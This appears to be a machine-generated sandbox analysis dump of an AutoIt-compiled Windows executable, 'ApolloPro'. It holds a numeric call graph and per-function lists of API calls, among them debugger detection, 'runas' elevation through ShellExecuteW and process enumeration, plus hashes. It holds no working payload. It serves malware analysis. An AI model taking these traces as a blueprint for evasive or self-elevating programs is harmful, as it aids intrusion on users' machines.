98674->98200 98675->98205 98676->98205 98677->98229 98678->98229 98679->98220 98680->98230 98681->98233 98682->98230 98683->98230 98684 657e83 98685 657e8f __fcloseall 98684->98685 98721 65a038 GetStartupInfoW 98685->98721 98687 657e94 98723 658dac GetProcessHeap 98687->98723 98689 657eec 98690 657ef7 98689->98690 98809 657fd3 58 API calls 3 library calls 98689->98809 98724 659d16 98690->98724 98693 657efd 98694 657f08 __RTC_Initialize 98693->98694 98810 657fd3 58 API calls 3 library calls 98693->98810 98745 65d802 98694->98745 98697 657f17 98698 657f23 GetCommandLineW 98697->98698 98811 657fd3 58 API calls 3 library calls 98697->98811 98764 665153 GetEnvironmentStringsW 98698->98764 98702 657f22 98702->98698 98704 657f3d 98705 657f48 98704->98705 98812 6532e5 58 API calls 3 library calls 98704->98812 98774 664f88 98705->98774 98708 657f4e 98709 657f59 98708->98709 98813 6532e5 58 API calls 3 library calls 98708->98813 98788 65331f 98709->98788 98712 657f61 98713 657f6c __wwincmdln 98712->98713 98814 6532e5 58 API calls 3 library calls 98712->98814 98794 645f8b 98713->98794 98716 657f80 98717 657f8f 98716->98717 98806 653588 98716->98806 98815 653310 58 API calls _doexit 98717->98815 98720 657f94 __fcloseall 98722 65a04e 98721->98722 98722->98687 98723->98689 98816 6533b7 36 API calls 2 library calls 98724->98816 98726 659d1b 98817 659f6c InitializeCriticalSectionAndSpinCount __mtinitlocks 98726->98817 98728 659d20 98729 659d24 98728->98729 98819 659fba TlsAlloc 98728->98819 98818 659d8c 61 API calls 2 library calls 98729->98818 98732 659d29 98732->98693 98733 659d36 98733->98729 98734 659d41 98733->98734 98820 658a05 98734->98820 98737 659d83 98828 659d8c 61 API calls 2 library calls 98737->98828 98740 659d88 98740->98693 98741 659d62 98741->98737 98742 659d68 98741->98742 98827 659c63 58 API calls 4 library calls 98742->98827 98744 659d70 GetCurrentThreadId 98744->98693 98746 65d80e __fcloseall 98745->98746 98747 659e3b __lock 58 API calls 98746->98747 98748 
65d815 98747->98748 98749 658a05 __calloc_crt 58 API calls 98748->98749 98751 65d826 98749->98751 98750 65d891 GetStartupInfoW 98758 65d8a6 98750->98758 98761 65d9d5 98750->98761 98751->98750 98752 65d831 __fcloseall @_EH4_CallFilterFunc@8 98751->98752 98752->98697 98753 65da9d 98842 65daad LeaveCriticalSection _doexit 98753->98842 98755 658a05 __calloc_crt 58 API calls 98755->98758 98756 65da22 GetStdHandle 98756->98761 98757 65da35 GetFileType 98757->98761 98758->98755 98759 65d8f4 98758->98759 98758->98761 98760 65d928 GetFileType 98759->98760 98759->98761 98840 65a05b InitializeCriticalSectionAndSpinCount 98759->98840 98760->98759 98761->98753 98761->98756 98761->98757 98841 65a05b InitializeCriticalSectionAndSpinCount 98761->98841 98765 665164 98764->98765 98766 657f33 98764->98766 98843 658a4d 58 API calls 2 library calls 98765->98843 98770 664d4b GetModuleFileNameW 98766->98770 98768 66518a _memmove 98769 6651a0 FreeEnvironmentStringsW 98768->98769 98769->98766 98771 664d7f _wparse_cmdline 98770->98771 98773 664dbf _wparse_cmdline 98771->98773 98844 658a4d 58 API calls 2 library calls 98771->98844 98773->98704 98775 664fa1 __NMSG_WRITE 98774->98775 98779 664f99 98774->98779 98776 658a05 __calloc_crt 58 API calls 98775->98776 98784 664fca __NMSG_WRITE 98776->98784 98777 665021 98778 652f85 _free 58 API calls 98777->98778 98778->98779 98779->98708 98780 658a05 __calloc_crt 58 API calls 98780->98784 98781 665046 98782 652f85 _free 58 API calls 98781->98782 98782->98779 98784->98777 98784->98779 98784->98780 98784->98781 98785 66505d 98784->98785 98845 664837 58 API calls __gmtime64_s 98784->98845 98846 658ff6 IsProcessorFeaturePresent 98785->98846 98787 665069 98787->98708 98789 65332b __IsNonwritableInCurrentImage 98788->98789 98869 65a701 98789->98869 98791 653349 __initterm_e 98792 652f70 __cinit 67 API calls 98791->98792 98793 653368 __cinit __IsNonwritableInCurrentImage 98791->98793 98792->98793 98793->98712 98795 645fa5 98794->98795 98796 646044 
98794->98796 98797 645fdf IsThemeActive 98795->98797 98796->98716 98872 65359c 98797->98872 98801 64600b 98884 645f00 SystemParametersInfoW SystemParametersInfoW 98801->98884 98803 646017 98885 645240 98803->98885 98805 64601f SystemParametersInfoW 98805->98796 100042 653459 98806->100042 98808 653597 98808->98717 98809->98690 98810->98694 98811->98702 98815->98720 98816->98726 98817->98728 98818->98732 98819->98733 98823 658a0c 98820->98823 98822 658a47 98822->98737 98826 65a016 TlsSetValue 98822->98826 98823->98822 98825 658a2a 98823->98825 98829 665426 98823->98829 98825->98822 98825->98823 98837 65a362 Sleep 98825->98837 98826->98741 98827->98744 98828->98740 98830 665431 98829->98830 98831 66544c 98829->98831 98830->98831 98832 66543d 98830->98832 98833 66545c RtlAllocateHeap 98831->98833 98835 665442 98831->98835 98839 6535d1 DecodePointer 98831->98839 98838 658d58 58 API calls __getptd_noexit 98832->98838 98833->98831 98833->98835 98835->98823 98837->98825 98838->98835 98839->98831 98840->98759 98841->98761 98842->98752 98843->98768 98844->98773 98845->98784 98847 659001 98846->98847 98852 658e89 98847->98852 98851 65901c 98851->98787 98853 658ea3 _memset __call_reportfault 98852->98853 98854 658ec3 IsDebuggerPresent 98853->98854 98860 65a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 98854->98860 98857 658faa 98859 65a370 GetCurrentProcess TerminateProcess 98857->98859 98858 658f87 __call_reportfault 98861 65c826 98858->98861 98859->98851 98860->98858 98862 65c830 IsProcessorFeaturePresent 98861->98862 98863 65c82e 98861->98863 98865 665b3a 98862->98865 98863->98857 98868 665ae9 5 API calls 2 library calls 98865->98868 98867 665c1d 98867->98857 98868->98867 98870 65a704 EncodePointer 98869->98870 98870->98870 98871 65a71e 98870->98871 98871->98791 98873 659e3b __lock 58 API calls 98872->98873 98874 6535a7 DecodePointer EncodePointer 98873->98874 98937 659fa5 LeaveCriticalSection 98874->98937 98876 646004 98877 653604 98876->98877 98878 65360e 
98877->98878 98879 653628 98877->98879 98878->98879 98938 658d58 58 API calls __getptd_noexit 98878->98938 98879->98801 98881 653618 98939 658fe6 9 API calls __gmtime64_s 98881->98939 98883 653623 98883->98801 98884->98803 98886 64524d __write_nolock 98885->98886 98887 641207 59 API calls 98886->98887 98888 645258 GetCurrentDirectoryW 98887->98888 98940 644ec8 98888->98940 98890 64527e IsDebuggerPresent 98891 64528c 98890->98891 98892 680b21 MessageBoxA 98890->98892 98893 680b39 98891->98893 98894 6452a0 98891->98894 98892->98893 99063 64314d 59 API calls Mailbox 98893->99063 99008 6431bf 98894->99008 98897 680b49 98905 680b5f SetCurrentDirectoryW 98897->98905 98899 645358 98901 64535f SetCurrentDirectoryW 98899->98901 98900 6452be GetFullPathNameW 98902 641821 59 API calls 98900->98902 98904 64536c Mailbox 98901->98904 98903 6452f9 98902->98903 99024 63bbc6 98903->99024 98904->98805 98905->98904 98908 645314 98909 64531e 98908->98909 99064 694f1c AllocateAndInitializeSid CheckTokenMembership FreeSid 98908->99064 99040 64514c GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98909->99040 98912 680b7c 98912->98909 98916 680b8d 98912->98916 99065 6500cf 98916->99065 98937->98876 98938->98881 98939->98883 98941 641207 59 API calls 98940->98941 98942 644ede 98941->98942 99080 645420 98942->99080 98944 644efc 99094 6419e1 98944->99094 98946 644f10 98947 641c9c 59 API calls 98946->98947 98948 644f1b 98947->98948 99098 63477a 98948->99098 98951 641a36 59 API calls 98952 644f34 98951->98952 98953 6339be 68 API calls 98952->98953 98954 644f44 Mailbox 98953->98954 98955 641a36 59 API calls 98954->98955 98956 644f68 98955->98956 98957 6339be 68 API calls 98956->98957 98958 644f77 Mailbox 98957->98958 98959 641207 59 API calls 98958->98959 98960 644f94 98959->98960 99101 6455bc 98960->99101 98964 644fae 98965 680a54 98964->98965 98966 644fb8 98964->98966 98967 6455bc 59 API calls 98965->98967 98968 65312d _W_store_winword 60 API calls 98966->98968 98969 680a68 
98967->98969 98970 644fc3 98968->98970 98972 6455bc 59 API calls 98969->98972 98970->98969 98971 644fcd 98970->98971 98973 65312d _W_store_winword 60 API calls 98971->98973 98974 680a84 98972->98974 98975 644fd8 98973->98975 98978 6500cf 61 API calls 98974->98978 98975->98974 98976 644fe2 98975->98976 98977 65312d _W_store_winword 60 API calls 98976->98977 98980 644fed 98977->98980 98979 680aa7 98978->98979 98981 6455bc 59 API calls 98979->98981 98982 644ff7 98980->98982 98997 680ad0 98980->98997 98983 680ab3 98981->98983 98984 64501b 98982->98984 98987 641c9c 59 API calls 98982->98987 98986 641c9c 59 API calls 98983->98986 98991 6347be 59 API calls 98984->98991 98985 6455bc 59 API calls 98988 680aee 98985->98988 98989 680ac1 98986->98989 98990 64500e 98987->98990 98992 641c9c 59 API calls 98988->98992 98993 6455bc 59 API calls 98989->98993 98994 6455bc 59 API calls 98990->98994 98995 64502a 98991->98995 98996 680afc 98992->98996 98993->98997 98994->98984 98998 634540 59 API calls 98995->98998 98999 6455bc 59 API calls 98996->98999 98997->98985 99000 645038 98998->99000 99001 680b0b 98999->99001 99117 6343d0 99000->99117 99001->99001 99003 63477a 59 API calls 99005 645055 99003->99005 99004 6343d0 59 API calls 99004->99005 99005->99003 99005->99004 99006 6455bc 59 API calls 99005->99006 99007 64509b Mailbox 99005->99007 99006->99005 99007->98890 99009 6431cc __write_nolock 99008->99009 99010 6431e5 99009->99010 99011 680314 _memset 99009->99011 99140 650284 99010->99140 99013 680330 GetOpenFileNameW 99011->99013 99015 68037f 99013->99015 99018 641821 59 API calls 99015->99018 99020 680394 99018->99020 99020->99020 99021 643203 99168 64278a 99021->99168 99025 63bbd3 __write_nolock 99024->99025 99979 642cb2 99025->99979 99027 63bbd8 99039 63bc52 99027->99039 99990 63c770 89 API calls 99027->99990 99029 63bbe5 99029->99039 99991 63f5a7 91 API calls Mailbox 99029->99991 99031 63bbee 99032 63bbf2 GetFullPathNameW 99031->99032 99031->99039 99033 641821 59 API calls 
99032->99033 99039->98897 99039->98908 99041 6451b6 LoadImageW RegisterClassExW 99040->99041 99042 680b10 99040->99042 99994 633411 7 API calls 99041->99994 99995 645f5b LoadImageW EnumResourceNamesW 99042->99995 99063->98897 99064->98912 99081 64542d __write_nolock 99080->99081 99082 641821 59 API calls 99081->99082 99087 645590 Mailbox 99081->99087 99083 64545f 99082->99083 99093 645495 Mailbox 99083->99093 99126 641609 99083->99126 99085 645563 99086 641a36 59 API calls 99085->99086 99085->99087 99088 645584 99086->99088 99087->98944 99090 644c94 59 API calls 99088->99090 99089 641a36 59 API calls 99089->99093 99090->99087 99091 641609 59 API calls 99091->99093 99093->99085 99093->99087 99093->99089 99093->99091 99129 644c94 99093->99129 99095 6419fb 99094->99095 99097 6419ee 99094->99097 99096 650fe6 Mailbox 59 API calls 99095->99096 99096->99097 99097->98946 99099 650fe6 Mailbox 59 API calls 99098->99099 99100 634787 99099->99100 99100->98951 99102 6455c6 99101->99102 99103 6455df 99101->99103 99104 641c9c 59 API calls 99102->99104 99105 641821 59 API calls 99103->99105 99106 644fa0 99104->99106 99105->99106 99107 65312d 99106->99107 99108 6531ae 99107->99108 99109 653139 99107->99109 99137 6531c0 60 API calls 3 library calls 99108->99137 99116 65315e 99109->99116 99135 658d58 58 API calls __getptd_noexit 99109->99135 99112 6531bb 99112->98964 99113 653145 99136 658fe6 9 API calls __gmtime64_s 99113->99136 99115 653150 99115->98964 99116->98964 99118 66d6c9 99117->99118 99120 6343e7 99117->99120 99118->99120 99139 6340cb 59 API calls Mailbox 99118->99139 99121 634530 99120->99121 99122 6344e8 99120->99122 99125 6344ef 99120->99125 99138 63523c 59 API calls 99121->99138 99124 650fe6 Mailbox 59 API calls 99122->99124 99124->99125 99125->99005 99127 641aa4 59 API calls 99126->99127 99128 641614 99127->99128 99128->99083 99130 644ca2 99129->99130 99134 644cc4 _memmove 99129->99134 99132 650fe6 Mailbox 59 API calls 99130->99132 99131 650fe6 Mailbox 59 API calls 
99133 644cd8 99131->99133 99132->99134 99133->99093 99134->99131 99135->99113 99136->99115 99137->99112 99138->99125 99139->99120 99202 661b70 99140->99202 99143 6502b0 99145 641821 59 API calls 99143->99145 99144 6502cd 99146 6419e1 59 API calls 99144->99146 99147 6502bc 99145->99147 99146->99147 99204 64133d 99147->99204 99150 6509c5 99151 661b70 __write_nolock 99150->99151 99152 6509d2 GetLongPathNameW 99151->99152 99153 641821 59 API calls 99152->99153 99154 6431f7 99153->99154 99155 642f3d 99154->99155 99156 641207 59 API calls 99155->99156 99157 642f4f 99156->99157 99158 650284 60 API calls 99157->99158 99159 642f5a 99158->99159 99160 642f65 99159->99160 99163 680177 99159->99163 99162 644c94 59 API calls 99160->99162 99164 642f71 99162->99164 99166 680191 99163->99166 99214 64151f 61 API calls 99163->99214 99208 631307 99164->99208 99167 642f84 Mailbox 99167->99021 99215 6449c2 99168->99215 99171 67f8d6 99332 699b16 99171->99332 99172 6449c2 136 API calls 99174 6427c3 99172->99174 99174->99171 99176 6427cb 99174->99176 99180 6427d7 99176->99180 99181 67f8f3 99176->99181 99177 67f8eb 99390 644a2f 99177->99390 99178 67f908 99179 650fe6 Mailbox 59 API calls 99178->99179 99198 67f94d Mailbox 99179->99198 99239 6429be 99180->99239 99396 6947e8 90 API calls _wprintf 99181->99396 99185 67f901 99185->99178 99187 67fb01 99188 652f85 _free 58 API calls 99187->99188 99189 67fb09 99188->99189 99190 644a2f 84 API calls 99189->99190 99195 67fb12 99190->99195 99194 652f85 _free 58 API calls 99194->99195 99195->99194 99197 644a2f 84 API calls 99195->99197 99398 68ff5c 89 API calls 4 library calls 99195->99398 99197->99195 99198->99187 99198->99195 99199 641a36 59 API calls 99198->99199 99367 68fef8 99198->99367 99370 69793a 99198->99370 99376 64343f 99198->99376 99384 643297 99198->99384 99397 68fe19 61 API calls 2 library calls 99198->99397 99199->99198 99203 650291 GetFullPathNameW 99202->99203 99203->99143 99203->99144 99205 64134b 99204->99205 99206 641981 59 API calls 
99205->99206 99207 64135b 99206->99207 99207->99150 99209 631319 99208->99209 99213 631338 _memmove 99208->99213 99211 650fe6 Mailbox 59 API calls 99209->99211 99210 650fe6 Mailbox 59 API calls 99212 63134f 99210->99212 99211->99213 99212->99167 99213->99210 99214->99163 99399 644b29 99215->99399 99220 6808bb 99222 644a2f 84 API calls 99220->99222 99221 6449ed LoadLibraryExW 99409 644ade 99221->99409 99224 6808c2 99222->99224 99226 644ade 3 API calls 99224->99226 99228 6808ca 99226->99228 99435 644ab2 99228->99435 99229 644a14 99229->99228 99230 644a20 99229->99230 99231 644a2f 84 API calls 99230->99231 99233 6427af 99231->99233 99233->99171 99233->99172 99236 6808f1 99443 644a6e 99236->99443 99238 6808fe 99240 67fd14 99239->99240 99241 6429e7 99239->99241 99818 68ff5c 89 API calls 4 library calls 99240->99818 99800 643df7 60 API calls Mailbox 99241->99800 99244 67fd27 99819 68ff5c 89 API calls 4 library calls 99244->99819 99245 642a09 99801 643e47 67 API calls 99245->99801 99247 642a1e 99247->99244 99248 642a26 99247->99248 99250 641207 59 API calls 99248->99250 99252 642a32 99250->99252 99251 67fd43 99254 642a93 99251->99254 99802 650b8b 60 API calls __write_nolock 99252->99802 99256 67fd56 99254->99256 99257 642aa1 99254->99257 99255 642a3e 99259 641207 59 API calls 99255->99259 99260 6442cf CloseHandle 99256->99260 99258 641207 59 API calls 99257->99258 99261 642aaa 99258->99261 99262 642a4a 99259->99262 99263 67fd62 99260->99263 99264 641207 59 API calls 99261->99264 99265 650284 60 API calls 99262->99265 99266 6449c2 136 API calls 99263->99266 99268 642ab3 99264->99268 99269 642a58 99265->99269 99267 67fd7e 99266->99267 99270 67fda3 99267->99270 99273 699b16 122 API calls 99267->99273 99805 650119 59 API calls Mailbox 99268->99805 99803 643ea1 ReadFile SetFilePointerEx 99269->99803 99820 68ff5c 89 API calls 4 library calls 99270->99820 99277 67fd96 99273->99277 99274 642aca 99806 6417e0 59 API calls Mailbox 99274->99806 99276 642a84 99804 64410a 
SetFilePointerEx SetFilePointerEx 99276->99804 99281 67fdbf 99277->99281 99282 67fd9e 99277->99282 99279 67fdba 99310 642c3e Mailbox 99279->99310 99285 644a2f 84 API calls 99281->99285 99284 644a2f 84 API calls 99282->99284 99283 642adb SetCurrentDirectoryW 99288 642aee Mailbox 99283->99288 99284->99270 99286 67fdc4 99285->99286 99287 650fe6 Mailbox 59 API calls 99286->99287 99293 67fdf8 99287->99293 99290 650fe6 Mailbox 59 API calls 99288->99290 99292 642b01 99290->99292 99291 6427ef 99291->98899 99291->98900 99294 64433f 59 API calls 99292->99294 99295 64343f 59 API calls 99293->99295 99321 642b0c Mailbox __NMSG_WRITE 99294->99321 99329 67fe41 Mailbox 99295->99329 99296 642c19 99814 6442cf 99296->99814 99298 680032 99302 69789a 59 API calls 99298->99302 99300 642c25 SetCurrentDirectoryW 99300->99310 99303 680054 99302->99303 99823 69fc0d 59 API calls 2 library calls 99303->99823 99306 680061 99308 652f85 _free 58 API calls 99306->99308 99307 6800cb 99826 68ff5c 89 API calls 4 library calls 99307->99826 99308->99310 99795 643e25 99310->99795 99312 6800e4 99312->99296 99313 64343f 59 API calls 99313->99329 99314 6800c3 99825 68fdb2 59 API calls 4 library calls 99314->99825 99316 641a36 59 API calls 99316->99321 99320 68fef8 59 API calls 99320->99329 99321->99296 99321->99307 99321->99314 99321->99316 99807 643ebe 67 API calls _wcscpy 99321->99807 99808 642e8f GetStringTypeW 99321->99808 99809 642dfe 60 API calls __wcsnicmp 99321->99809 99810 642edc GetStringTypeW __NMSG_WRITE 99321->99810 99811 65386d GetStringTypeW _iswctype 99321->99811 99812 6427fc 165 API calls 3 library calls 99321->99812 99813 64314d 59 API calls Mailbox 99321->99813 99322 641a36 59 API calls 99322->99329 99323 69793a 59 API calls 99323->99329 99325 680084 99824 68ff5c 89 API calls 4 library calls 99325->99824 99328 68009d 99330 652f85 _free 58 API calls 99328->99330 99329->99298 99329->99313 99329->99320 99329->99322 99329->99323 99329->99325 99821 68fe19 61 API calls 2 library calls 
99329->99821 99822 64314d 59 API calls Mailbox 99329->99822 99331 6800b0 99330->99331 99331->99310 99333 644a8c 85 API calls 99332->99333 99334 699b85 99333->99334 99827 699cf1 99334->99827 99337 644ab2 74 API calls 99338 699bb4 99337->99338 99339 644ab2 74 API calls 99338->99339 99340 699bc4 99339->99340 99341 644ab2 74 API calls 99340->99341 99342 699bdf 99341->99342 99343 644ab2 74 API calls 99342->99343 99344 699bfa 99343->99344 99345 644a8c 85 API calls 99344->99345 99346 699c11 99345->99346 99347 65593c __crtGetStringTypeA_stat 58 API calls 99346->99347 99348 699c18 99347->99348 99349 65593c __crtGetStringTypeA_stat 58 API calls 99348->99349 99350 699c22 99349->99350 99351 644ab2 74 API calls 99350->99351 99352 699c36 99351->99352 99353 6996c4 GetSystemTimeAsFileTime 99352->99353 99354 699c49 99353->99354 99355 699c5e 99354->99355 99356 699c73 99354->99356 99357 652f85 _free 58 API calls 99355->99357 99358 699c79 99356->99358 99359 699cd8 99356->99359 99360 699c64 99357->99360 99833 6990c1 99358->99833 99362 652f85 _free 58 API calls 99359->99362 99363 652f85 _free 58 API calls 99360->99363 99365 67f8e7 99362->99365 99363->99365 99365->99177 99365->99178 99366 652f85 _free 58 API calls 99366->99365 99368 650fe6 Mailbox 59 API calls 99367->99368 99369 68ff28 _memmove 99368->99369 99369->99198 99371 697945 99370->99371 99372 650fe6 Mailbox 59 API calls 99371->99372 99373 69795c 99372->99373 99374 641a36 59 API calls 99373->99374 99375 69796b 99373->99375 99374->99375 99375->99198 99377 6434df 99376->99377 99381 643452 _memmove 99376->99381 99379 650fe6 Mailbox 59 API calls 99377->99379 99378 650fe6 Mailbox 59 API calls 99380 643459 99378->99380 99379->99381 99382 650fe6 Mailbox 59 API calls 99380->99382 99383 643482 99380->99383 99381->99378 99382->99383 99383->99198 99385 6432aa 99384->99385 99388 643358 99384->99388 99386 650fe6 Mailbox 59 API calls 99385->99386 99387 6432dc 99385->99387 99386->99387 99387->99388 99389 650fe6 59 API calls Mailbox 99387->99389 

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0064526C
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0064527E
                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006452E6
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                                • Part of subcall function 0063BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0063BC07
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00645366
                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00680B2E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00680B66
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006E6D10), ref: 00680BE9
                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00680BF0
                                                                                                • Part of subcall function 0064514C: GetSysColorBrush.USER32(0000000F), ref: 00645156
                                                                                                • Part of subcall function 0064514C: LoadCursorW.USER32(00000000,00007F00), ref: 00645165
                                                                                                • Part of subcall function 0064514C: LoadIconW.USER32(00000063), ref: 0064517C
                                                                                                • Part of subcall function 0064514C: LoadIconW.USER32(000000A4), ref: 0064518E
                                                                                                • Part of subcall function 0064514C: LoadIconW.USER32(000000A2), ref: 006451A0
                                                                                                • Part of subcall function 0064514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006451C6
                                                                                                • Part of subcall function 0064514C: RegisterClassExW.USER32(?), ref: 0064521C
                                                                                                • Part of subcall function 006450DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00645109
                                                                                                • Part of subcall function 006450DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0064512A
                                                                                                • Part of subcall function 006450DB: ShowWindow.USER32(00000000), ref: 0064513E
                                                                                                • Part of subcall function 006450DB: ShowWindow.USER32(00000000), ref: 00645147
                                                                                                • Part of subcall function 006459D3: _memset.LIBCMT ref: 006459F9
                                                                                                • Part of subcall function 006459D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00645A9E
                                                                                              Strings
                                                                                              • runas, xrefs: 00680BE4
                                                                                              • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00680B28
                                                                                              • AutoIt, xrefs: 00680B23
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                              • API String ID: 529118366-2030392706
                                                                                              • Opcode ID: 481430e28d174019061d248353c14dd58efce24f08c6786dbe1e2a0ddca4a0ca
                                                                                              • Instruction ID: d2b0019a4c3a26b17e84af7ba38e2ba2d823ffeaf2f6fd60252d048e425615fb
                                                                                              • Opcode Fuzzy Hash: 481430e28d174019061d248353c14dd58efce24f08c6786dbe1e2a0ddca4a0ca
                                                                                              • Instruction Fuzzy Hash: 8551063090824CEFDF51AFB0DC46DFE7B7BAF06340F101169F552A6262DAB55649CB24

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00645D40
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • GetCurrentProcess.KERNEL32(?,006C0A18,00000000,00000000,?), ref: 00645E07
                                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00645E0E
                                                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00645E54
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00645E5F
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00645E90
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00645E9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1986165174-0
                                                                                              • Opcode ID: 357dc518f7d9839755a189b845f06731bf462f08e88a38c5d8517fda967cff8a
                                                                                              • Instruction ID: 32abdd71690ba8616f1022f8bfcae7feaf20c8659ee0d7014b47e06902150ed1
                                                                                              • Opcode Fuzzy Hash: 357dc518f7d9839755a189b845f06731bf462f08e88a38c5d8517fda967cff8a
                                                                                              • Instruction Fuzzy Hash: B191C331549BC4DFD731DB7884505EAFFE66F2A300B884A9ED0C797B02D630A649C75A
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0069416D
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0069417B
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0069419B
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00694245
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 420147892-0
                                                                                              • Opcode ID: 03529bbe949964b26267945c3790542942c4b88b02fae419a03db6a7d8c020d2
                                                                                              • Instruction ID: 4dbcbbc3e7ed72003c534732fa3760fd0b0c5751e7704d63355c4753ba00b260
                                                                                              • Opcode Fuzzy Hash: 03529bbe949964b26267945c3790542942c4b88b02fae419a03db6a7d8c020d2
                                                                                              • Instruction Fuzzy Hash: 96319F711083419FD704EF90D885EAFBBEABF96350F04052DF585C61A1EF719A8ACB92
                                                                                              APIs
                                                                                                • Part of subcall function 00643740: CharUpperBuffW.USER32(?,006F71DC,00000001,?,00000000,006F71DC,?,006353A5,?,?,?,?), ref: 0064375D
                                                                                              • _memmove.LIBCMT ref: 0063B68A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2819905725-0
                                                                                              • Opcode ID: d58ffb119a715e5fea68dffaec35e4107a71e197f104d6e11c895cd3f5b7d4ca
                                                                                              • Instruction ID: 53ebdd067c1c3e63bc4e8dd2b38c5c9be09bf3b287b93903b811c1b2f9f247da
